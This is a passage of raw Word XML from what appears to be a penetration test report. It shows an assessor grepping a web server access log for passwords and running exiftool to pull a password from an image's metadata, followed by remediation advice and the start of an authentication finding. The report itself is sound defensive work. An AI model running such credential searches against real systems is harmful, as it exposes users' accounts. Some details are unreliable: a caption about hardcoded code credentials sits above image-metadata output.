      <w:tr w:rsidR="008C4490" w14:paraId="0D0E1593" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="52D717EF" w14:textId="690468ED" w:rsidR="008C4490" w:rsidRDefault="008C4490" w:rsidP="008C4490">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gibson@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>nbnserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:~</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>$ grep -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> "password" /var/log/apache2/access.log.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69A8D55C" w14:textId="0BA04CC0" w:rsidR="008C4490" w:rsidRPr="004E111C" w:rsidRDefault="008C4490" w:rsidP="008C4490">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r>
              <w:t>172.16.1.2 - - [04/May/2020:06:25:33 +0000] "GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>login.php?</w:t>
            </w:r>
            <w:r w:rsidRPr="008C4490">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C4490">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008C4490">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>stephenson&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008C4490">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
            <w:r>
              <w:t>&amp;Login=Enter HTTP/1.1" 302 3421 "-"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="705E5223" w14:textId="6FF45D23" w:rsidR="008C4490" w:rsidRDefault="008C4490" w:rsidP="008C4490">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Log Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F34A37" w14:textId="2F19CCBF" w:rsidR="00884BFC" w:rsidRDefault="008C4490" w:rsidP="00BA5F4C">
      <w:r>
        <w:t>When the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hyperthetical team</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reviewed the log file, the assessors retrieved the valid password for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00884BFC">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>stephenson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C4490">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>user account on the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465A2E17" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00124941" w:rsidRDefault="00124941" w:rsidP="00124941">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00124941">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA6FEAE" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00124941" w:rsidRDefault="00124941" w:rsidP="00124941">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00124941">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/html/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00124941">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D8506EA" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00124941" w:rsidRDefault="00124941" w:rsidP="00124941">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00124941">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/var/www/staging/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00124941">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03253B22" w14:textId="4AEE48AF" w:rsidR="00124941" w:rsidRDefault="00124941" w:rsidP="00BA5F4C">
      <w:r>
        <w:t xml:space="preserve">The assessment team discovered credentials for the application MySQL Server hardcoded in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and stored in cleartext. The below figure shows the part of the code where they were found.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00124941" w14:paraId="65B664AB" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7BB0C8A0" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00884BFC" w:rsidRDefault="00124941" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>exiftool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> CEO_gibson.jpg                       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480DAF84" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00884BFC" w:rsidRDefault="00124941" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>ExifTool</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> Version Number       </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> 12.57</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50132B80" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00884BFC" w:rsidRDefault="00124941" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">File Name                     </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> CEO_gibson.jpg</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A78B175" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00884BFC" w:rsidRDefault="00124941" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533C94D1" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00884BFC" w:rsidRDefault="00124941" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Title                         </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> profile picture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5626026C" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00884BFC" w:rsidRDefault="00124941" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Description                   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>gibson</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> profile picture</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B37C3AD" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00884BFC" w:rsidRDefault="00124941" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Warning                       </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve"> [minor] Fixed incorrect URI for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t>xmlns:MicrosoftPhoto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="755A8089" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="00884BFC" w:rsidRDefault="00124941" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">Flash Model                   </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00884BFC">
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00884BFC">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00884BFC">
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t xml:space="preserve"> passwd:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ImportantChar"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C020CEB" w14:textId="77777777" w:rsidR="00124941" w:rsidRPr="004E111C" w:rsidRDefault="00124941" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="omittedforbrevity"/>
            </w:pPr>
            <w:r w:rsidRPr="00884BFC">
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2140D109" w14:textId="18605AB9" w:rsidR="00124941" w:rsidRDefault="00124941" w:rsidP="00124941">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credentials in Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A3C728" w14:textId="77777777" w:rsidR="00124941" w:rsidRDefault="00124941" w:rsidP="00BA5F4C"/>
    <w:p w14:paraId="78DD7A3D" w14:textId="77777777" w:rsidR="00D36E2B" w:rsidRPr="00D36E2B" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="17"/>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D561D" w14:textId="46E0D849" w:rsidR="00D847D3" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D847D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use of encryption and hashing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> One of the most effective ways to prevent information disclosure through credentials stored in plaintext is to use encryption and hashing. Passwords and other sensitive credentials should be encrypted or hashed before being stored in a database or other storage medium. This can help prevent unauthorized access to the credentials, even if the storage medium is compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167708B5" w14:textId="774D6043" w:rsidR="00D847D3" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D847D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access controls and permissions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Access controls and permissions should be used to restrict access to systems and databases where plaintext credentials are stored. Only authorized personnel who need access to the credentials should be granted access, and access should be granted on a need-to-know basis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1641CFF9" w14:textId="77777777" w:rsidR="00D36E2B" w:rsidRPr="00455A9D" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B"/>
    <w:p w14:paraId="75D43295" w14:textId="77777777" w:rsidR="00D36E2B" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
      <w:commentRangeEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:commentReference w:id="17"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A587FF" w14:textId="174FCD85" w:rsidR="00D36E2B" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-256: Plaintext Storage of a Password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC10ED3" w14:textId="417F2D81" w:rsidR="00D36E2B" w:rsidRDefault="00D36E2B" w:rsidP="00D36E2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/256.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F0CD3" w14:textId="37FB677F" w:rsidR="00D847D3" w:rsidRDefault="00D847D3" w:rsidP="00D847D3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP - </w:t>
      </w:r>
      <w:r w:rsidRPr="00D847D3">
        <w:t>Password Plaintext Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10918F5D" w14:textId="242A7726" w:rsidR="00D847D3" w:rsidRPr="001330E3" w:rsidRDefault="00D847D3" w:rsidP="00D36E2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/vulnerabilities/Password_Plaintext_Storage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0C844A" w14:textId="77777777" w:rsidR="00BA5F4C" w:rsidRDefault="00BA5F4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32167FE7" w14:textId="208C28F8" w:rsidR="00455A9D" w:rsidRPr="001215EC" w:rsidRDefault="00400385" w:rsidP="00455A9D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Insufficient</w:t>
      </w:r>
      <w:r w:rsidR="00455A9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authentication Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24358016" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRPr="006F5E52" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">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455A9D" w:rsidRPr="005264D0" w14:paraId="3DFF081E"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337F8431" w14:textId="30C2A475" w:rsidR="00455A9D" w:rsidRPr="005264D0" w:rsidRDefault="00D847D3" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Insufficient Authorization Controls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455A9D" w:rsidRPr="005264D0" w14:paraId="18BE6E27"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7BE74933" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRPr="00DA733E" w:rsidRDefault="00455A9D"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72F035B7" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRPr="005264D0" w:rsidRDefault="00455A9D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFAFAF"/>
          </w:tcPr>
          <w:p w14:paraId="0449A7FE" w14:textId="565E7C44" w:rsidR="00455A9D" w:rsidRPr="005264D0" w:rsidRDefault="00455A9D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00455A9D" w:rsidRPr="005264D0" w14:paraId="75553E7E"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5C948E74" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRPr="005264D0" w:rsidRDefault="00455A9D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2399" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A29F280" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRPr="005264D0" w:rsidRDefault="00455A9D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS Vector String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5305" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4648E3BA" w14:textId="576E4A13" w:rsidR="00455A9D" w:rsidRPr="005264D0" w:rsidRDefault="00455A9D" w:rsidP="006F27F5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00455A9D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>CVSS:3.1/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00455A9D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>AV:N</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00455A9D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="624B6580" w14:textId="3C16033E" w:rsidR="00455A9D" w:rsidRPr="00DA733E" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00400385">
        <w:t>Authorization issues occur when the application fails to successfully implement authentication controls. These issues may result in arbitrary users gaining unauthorized access to the application, its underlying functionality, or protected resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0181D7EA" w14:textId="77777777" w:rsidR="00455A9D" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Affected Locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44DB83" w14:textId="3BE55128" w:rsidR="00455A9D" w:rsidRPr="003C17E2" w:rsidRDefault="00400385" w:rsidP="00455A9D">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidR="00455A9D" w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A61094" w14:textId="52B11A1A" w:rsidR="00455A9D" w:rsidRPr="003C17E2" w:rsidRDefault="00455A9D" w:rsidP="00455A9D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B51413">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00400385">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00400385">
        <w:t>Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33626FB7" w14:textId="153CDA04" w:rsidR="005D1352" w:rsidRPr="003C17E2" w:rsidRDefault="005D1352" w:rsidP="005D1352">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>http://</w:t>
      </w:r>
      <w:r w:rsidRPr="003C17E2">
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:8001 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1352">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(Staging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62648533" w14:textId="09F69288" w:rsidR="005D1352" w:rsidRPr="003C17E2" w:rsidRDefault="005D1352" w:rsidP="005D1352">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
